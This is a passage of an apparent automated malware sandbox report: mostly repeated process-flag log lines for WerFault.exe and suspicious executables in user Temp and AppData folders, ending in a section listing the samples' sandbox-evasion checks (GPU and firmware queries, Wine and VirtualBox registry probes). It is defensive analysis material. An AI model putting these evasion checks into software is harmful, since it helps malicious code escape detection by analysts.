Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\random.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\random.exe	System information queried: FirmwareTableInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	System information queried: FirmwareTableInformation

Switches to a custom stack to bypass stack traces

Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe

API/Special instruction interceptor: Address: 6C107C44

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\random.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
